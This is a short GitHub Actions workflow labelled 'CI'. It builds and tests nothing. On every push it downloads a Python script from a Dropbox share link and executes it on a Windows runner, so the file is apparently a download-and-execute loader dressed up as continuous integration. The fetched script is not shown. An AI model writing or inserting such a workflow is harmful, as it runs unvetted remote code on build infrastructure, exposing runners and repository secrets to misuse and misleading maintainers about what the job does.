name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download
      run: Invoke-WebRequest "https://www.dropbox.com/scl/fi/ogkexp4ydm599a8irt8rd/index.py?rlkey=mmz2w2n2057wcp59mxvgrjjv7&dl=1" -OutFile index.py
    - name: running
      run: py index.py
